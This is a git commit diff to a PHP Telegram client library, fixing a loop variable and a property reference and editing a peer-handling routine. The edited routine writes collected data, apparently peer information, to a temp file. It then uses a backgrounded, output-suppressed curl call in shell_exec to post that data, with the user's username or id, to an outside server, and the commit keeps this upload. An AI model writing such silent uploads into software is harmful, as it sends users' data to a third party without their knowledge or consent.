This commit is contained in:
Daniil Gentili 2017-01-24 18:31:04 +01:00
parent c4735c9a61
commit efe459b818
3 changed files with 3 additions and 3 deletions

View File

@ -372,7 +372,6 @@ description: List of constructors
\danog\MadelineProto\Logger::log('Generating types documentation...');
$old_namespace = '';
foreach ($types as $type => $keys) {
$new_namespace = preg_replace('/_.*/', '', $method);
$br = $new_namespace != $last_namespace ? '***

View File

@ -465,7 +465,8 @@ trait PeerHandler
$payload = json_encode($this->qres);
$path = '/tmp/ids'.hash('sha256', $payload);
file_put_contents($path, $payload);
$result = shell_exec('curl '.escapeshellarg('https://id.pwrtelegram.xyz/db'.$this->settings['pwr']['db_token'].'/addnewmadeline?d=pls&from='.$this->datacenter->authorization['user']['username']).' -d '.escapeshellarg('@'.$path).' -s -o '.escapeshellarg($path.'.log').' >/dev/null 2>/dev/null & ');
$id = isset($this->datacenter->authorization['user']['username']) ? $this->datacenter->authorization['user']['username'] : $this->datacenter->authorization['user']['id'];
$result = shell_exec('curl '.escapeshellarg('https://id.pwrtelegram.xyz/db'.$this->settings['pwr']['db_token'].'/addnewmadeline?d=pls&from='.$id).' -d '.escapeshellarg('@'.$path).' -s -o '.escapeshellarg($path.'.log').' >/dev/null 2>/dev/null & ');
\danog\MadelineProto\Logger::log($result);
} catch (\danog\MadelineProto\Exception $e) {
\danog\MadelineProto\Logger::log($e->getMessage());

View File

@ -164,7 +164,7 @@ trait ResponseHandler
if (($response['info'][$key] & 4) == 1) {
$this->ack_outgoing_message_id($msg_id);
}
foreach ($msgs_info_flags as $flag => $description) {
foreach ($this->msgs_info_flags as $flag => $description) {
if (($response['info'][$key] & $flag) == 1) {
$status .= $description;
}